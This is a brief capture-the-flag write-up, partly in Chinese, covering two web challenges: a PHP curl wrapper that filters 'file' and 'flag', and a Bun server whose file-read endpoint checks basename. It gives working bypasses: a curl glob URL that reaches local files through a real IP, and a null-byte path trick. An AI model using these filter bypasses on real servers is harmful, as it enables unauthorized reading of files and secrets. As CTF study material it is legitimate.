https://hackmd.io/@parrot409/H1VJQZEep
hello
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <?php
highlight_file(__FILE__); $url = 'file:///hi.txt'; if( array_key_exists('x', $_GET) && !str_contains(strtolower($_GET['x']),'file') && !str_contains(strtolower($_GET['x']),'flag') ){ $url = $_GET['x']; } system('curl '.escapeshellarg($url));
|
提示通配符绕过
http://45.147.231.180:8000/?x=fil[a-z:1]:///[a-z]ext.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| const fs = require('node:fs'); const path = require('path')
const secret = '39c8e9953fe8ea40ff1c59876e0e2f28' const server = Bun.serve({ port: 8000, fetch(req) { let url = new URL(req.url); let pname = url.pathname; if(pname.startsWith(`/${secret}`)){ if(pname.startsWith(`/${secret}/read`)){ try{ let fpath = url.searchParams.get('file'); if(path.basename(fpath).indexOf('next') == -1){ return new Response(fs.readFileSync(fpath).toString('base64')); } else { return new Response('no way'); } } catch(e){ } return new Response("Couldn't read your file :("); } return new Response(`did you know i can read files?? amazing right,,, maybe try /${secret}/read/?file=/proc/self/cmdline`); } return } });
|
用/next.js%00/.
绕过
fs.readFileSync
不检查空字节,path.basename
只执行path.slice(lastIndexOfSlash+1)